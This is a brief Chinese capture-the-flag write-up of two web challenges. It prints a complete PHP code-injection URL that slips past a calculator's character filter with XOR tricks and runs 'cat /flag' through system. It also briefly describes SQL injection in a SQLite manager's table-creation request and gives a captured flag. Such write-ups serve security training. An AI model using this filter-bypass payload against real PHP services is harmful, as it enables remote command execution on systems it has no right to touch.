文章来源:EDI安全
01
web题 SimpleCalculator
题目:简单的计算器
进去后发现flag.php计算功能可绕过执行shell
http://eci-2zei447jhyte2gq76fli.cloudeci1.ichunqiu.com/flag.php?search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag
得到flag
02
web题SQLManager
题目:简易的SQLite管理器
这题存在注入在建表包注入
获得表名,表列
然后获得flag
flag{914162a9-5a2e-4b80-9d74-93c119a3ef86}
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容